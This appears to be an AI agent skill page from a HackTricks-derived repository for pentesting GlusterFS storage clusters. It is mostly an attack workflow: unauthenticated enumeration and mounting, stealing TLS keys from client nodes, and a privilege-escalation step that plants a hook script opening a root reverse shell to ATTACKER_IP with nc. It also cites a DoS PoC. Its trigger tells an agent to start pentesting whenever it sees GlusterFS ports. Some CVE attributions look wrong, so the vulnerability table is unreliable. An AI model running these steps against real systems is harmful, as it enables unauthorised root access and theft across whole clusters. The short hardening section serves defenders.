OpenSkillIndex← back to search

Hacktricks-skills glusterfs-pentest

Pentest GlusterFS distributed file systems. Use this skill whenever you encounter ports 24007, 24008, 24009, or 49152+ in a scan, or when the user mentions GlusterFS, distributed storage, glusterd, or gluster-brick. This skill covers enumeration, exploitation of known CVEs (2022-2025), privilege escalation via gluster_shared_storage, and hardening recommendations.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs/SKILL.MD
source content

GlusterFS Pentesting

A skill for assessing GlusterFS distributed file systems, including enumeration, exploitation of known vulnerabilities, and hardening guidance.

What is GlusterFS?

GlusterFS is a distributed file system that combines storage from multiple servers into one unified namespace. Key ports:

PortServicePurpose
24007/TCPglusterdManagement daemon (RPC)
24008-24009/TCPgluster-brickLegacy brick transport (pre-9.x)
49152+/TCPgluster-brickData-plane bricks (one per brick, incrementing)

Tip: Port 24007 answers RPC calls even when storage-only nodes don't export volumes, making it a reliable pivot target in large infrastructures.

Prerequisites

Install client utilities on your attacking box:

# Debian/Ubuntu
sudo apt install -y glusterfs-cli glusterfs-client

# RHEL/CentOS
sudo yum install -y glusterfs-cli glusterfs-fuse

Enumeration

1. Peer Discovery & Health

List peers (works without authentication in default setups):

gluster --remote-host <TARGET_IP> peer status

2. Volume Reconnaissance

Retrieve all volumes and their configuration:

gluster --remote-host <TARGET_IP> volume info all

3. Mount Without Privileges

sudo mount -t glusterfs <TARGET_IP>:/<VOL_NAME> /mnt/gluster

If mounting fails, check 

/var/log/glusterfs/<vol_name>-<uid>.log
on the client. Common issues:

  • TLS enforcement (
    option transport.socket.ssl on
    )
  • Address-based access control (
    option auth.allow <cidr>
    )

Certificate Troubleshooting

If TLS is required, steal these files from any authorized client node and place them in 

/etc/ssl/
:

/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca

Known Vulnerabilities (2022-2025)

CVEAffected VersionsImpactNotes
CVE-2022-4834010.0–10.4, 11.0Use-after-free in 
dht_setxattr_mds_cbk
Remote DoS and probable RCE. Fixed in 10.4.1 / 11.1
CVE-2023-26253< 11.0Out-of-bounds read in FUSE notify handlerRemote crash via crafted FS operations; public PoC available
CVE-2023-3775< 10.5 / 11.1Incorrect permission validation on 
gluster_shared_storage
Lets any unauthenticated client mount admin volume – leads to priv-esc

Always check 

gluster --version
on every node; heterogeneous clusters are common after partial upgrades.

Exploitation

Privilege Escalation via 
gluster_shared_storage

Many administrators leave the special 

gluster_shared_storage
volume world-readable because it simplifies geo-replication. The volume contains cronjob templates that run with root on every node.

# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs <TARGET_IP>:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronized cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root

If 

hooks/1/
is not present, look for 
/ss_bricks/
– the exact path may vary with the major version.

Denial-of-Service (CVE-2023-26253)

Use the bundled script to crash 

glusterfsd
< 11.0:

# Run the DoS PoC
./scripts/gluster-dos-poc.py <TARGET_IP>

This sends a malformed NOTIFY_REPLY XDR frame to port 24007.

Hardening & Detection

For Defenders

  1. Upgrade – Current LTS is 11.1 (July 2025). All CVEs above are fixed.

  2. Enable TLS for every brick:

    gluster volume set <vol> transport.socket.ssl on
gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem

  3. Restrict clients with CIDR lists:

    gluster volume set <vol> auth.allow 10.0.0.0/24

  4. Expose management port 24007 only on a private VLAN or through SSH tunnels.

  5. Watch logs:

    tail -f /var/log/glusterfs/glusterd.log
gluster volume set <vol> features.audit-log on

Workflow Summary

  1. Scan for ports 24007, 24008, 24009, 49152+
  2. Enumerate with 
    gluster peer status
    and 
    gluster volume info all
  3. Check version to identify vulnerable CVEs
  4. Attempt mount of volumes (especially 
    gluster_shared_storage
    )
  5. Exploit based on version and configuration
  6. Document findings and hardening recommendations

References